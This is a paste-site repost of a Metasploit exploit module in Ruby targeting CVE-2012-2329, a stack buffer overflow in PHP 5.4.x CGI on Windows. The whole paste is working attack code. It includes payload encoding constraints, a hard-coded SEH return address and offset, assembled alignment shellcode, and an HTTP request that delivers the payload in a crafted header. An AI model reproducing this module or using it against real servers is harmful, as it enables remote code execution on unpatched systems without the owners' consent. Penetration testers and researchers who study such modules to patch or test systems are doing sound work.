PHP apache_request_headers Function Buffer Overflow


SUBMITTED BY: Guest

DATE: Nov. 25, 2013, 9:17 p.m.

FORMAT: Text only

SIZE: 5.3 kB

HITS: 2321

  1. ##
  2. # This file is part of the Metasploit Framework and may be subject to
  3. # redistribution and commercial restrictions. Please see the Metasploit
  4. # web site for more information on licensing and terms of use.
  5. # http://metasploit.com/
  6. ##
  7. require 'msf/core'
  8. class Metasploit3 < Msf::Exploit::Remote
  9. Rank = NormalRanking
  10. include Msf::Exploit::Remote::HttpClient
  11. include Msf::Exploit::Remote::Seh
  12. def initialize(info = {})
  13. super(update_info(info,
  14. 'Name' => 'PHP apache_request_headers Function Buffer Overflow',
  15. 'Description' => %q{
  16. This module exploits a stack based buffer overflow in the CGI version of PHP
  17. 5.4.x before 5.4.3. The vulnerability is due to the insecure handling of the
  18. HTTP headers.
  19. This module has been tested against the thread safe version of PHP 5.4.2,
  20. from "windows.php.net", running with Apache 2.2.22 from "apachelounge.com".
  21. },
  22. 'Author' =>
  23. [
  24. 'Vincent Danen', # Vulnerability discovery
  25. 'juan vazquez', # Metasploit module
  26. ],
  27. 'License' => MSF_LICENSE,
  28. 'Version' => '$Revision$',
  29. 'References' =>
  30. [
  31. [ 'CVE', '2012-2329'],
  32. [ 'OSVDB', '82215'],
  33. [ 'BID', '53455'],
  34. [ 'URL', 'http://www.php.net/archive/2012.php#id2012-05-08-1' ],
  35. [ 'URL', 'http://www.php.net/ChangeLog-5.php#5.4.3'],
  36. [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=820000' ]
  37. ],
  38. 'DefaultOptions' =>
  39. {
  40. 'EXITFUNC' => 'process',
  41. },
  42. 'Privileged' => true,
  43. 'Payload' =>
  44. {
  45. 'Space' => 1321,
  46. 'DisableNops' => true,
  47. 'BadChars' => "\x00\x0d\x0a\x5f\x80\x8e\x9e\x9f" + (0x41..0x5a).to_a.pack("C*") + (0x82..0x8c).to_a.pack("C*") + (0x91..0x9c).to_a.pack("C*"),
  48. 'EncoderType' => Msf::Encoder::Type::NonUpperUnderscoreSafe,
  49. 'EncoderOptions' =>
  50. {
  51. 'BufferOffset' => 0x0
  52. }
  53. },
  54. 'Platform' => 'win',
  55. 'Targets' =>
  56. [
  57. ['Windows XP SP3 / Windows 2003 Server SP2 (No DEP) / PHP 5.4.2 Thread safe',
  58. {
  59. 'Ret' => 0x1002aa79, # ppr from php5ts.dll
  60. 'Offset' => 1332
  61. }
  62. ],
  63. ],
  64. 'DefaultTarget' => 0,
  65. 'DisclosureDate' => 'May 08 2012'))
  66. register_options(
  67. [
  68. OptString.new('TARGETURI', [true, 'The URI path to the php using apache_request_headers', '/php/test.php']),
  69. ], self.class)
  70. end
  71. def exploit
  72. print_status("Trying target #{target.name}...")
  73. # Make ECX point to the start of the encoded payload
  74. align_ecx = "pop esi\n" # "\x5e"
  75. esi_alignment = target['Offset'] + # Space from the start of align_ecx to nseh handler
  76. 8 + # len(nseh + seh)
  77. 5 - # len(call back)
  78. 11 # len(align_ecx)
  79. align_ecx << "add esi, -#{esi_alignment}\n" # "\x81\xC6" + 4 bytes imm (ex: "\xCA\xFA\xFF\xFF")
  80. align_ecx << "sub ecx, ecx\n" # "\x29\xC9"
  81. align_ecx << "add ecx, esi" # "\x01\xf1"
  82. sploit = Metasm::Shellcode.assemble(Metasm::Ia32.new, align_ecx).encode_string
  83. # Encoded payload
  84. sploit << payload.encoded
  85. # Padding if needed
  86. sploit << rand_text(target['Offset']-sploit.length)
  87. # SEH handler overwrite
  88. sploit << generate_seh_record(target.ret)
  89. # Call back "\xE8" + 4 bytes imm (ex: "\xBF\xFA\xFF\xFF")
  90. sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "call $-#{target['Offset']+8}").encode_string
  91. # Make it crash
  92. sploit << rand_text(4096 - sploit.length)
  93. print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
  94. res = send_request_cgi({
  95. 'uri' => target_uri.to_s,
  96. 'method' => 'GET',
  97. 'headers' =>
  98. {
  99. "HTTP_X_#{rand_text_alpha_lower(4)}" => sploit,
  100. }
  101. })
  102. if res and res.code == 500
  103. print_status "We got a 500 error code. Even without a session it could be an exploitation signal!"
  104. end
  105. handler
  106. end
  107. end

comments powered by Disqus